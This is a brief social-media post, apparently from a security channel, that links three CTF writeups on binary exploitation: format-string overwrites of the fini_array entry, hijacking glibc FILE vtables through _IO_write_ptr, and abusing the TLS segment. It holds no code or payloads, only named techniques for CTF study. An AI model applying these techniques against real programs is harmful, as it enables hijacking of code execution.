2021-07-10 18:41:19
While solving one task from redpwn ctf ( I’ll create my own writeup later, sure. Task is excellent) I found some amazing writeups that reviews similar exploitation techniques.
1) Interesting way of exploiting format string bug in binary with disabled PIE: overwriting __do_global_dtors_aux_fini_array_entry to hijack code execution flow.
link: https://ctftime.org/writeup/20796
2) Overwriting __IO_write_ptr and calling exit ( forcing exit to call __IO_overflow_t ) to leak libc and changing vtable of __IO_file
to hijack code execution flow.
link: https://hackmd.io/@ptr-yudai/ByRfC6O_H
3) Discovering .tls segment for exploitation purposes
link: https://fireshellsecurity.team/byte-bandits-look-beyond/
#pwn #heap #tls #IO #format-string-bug #stack
315 views15:41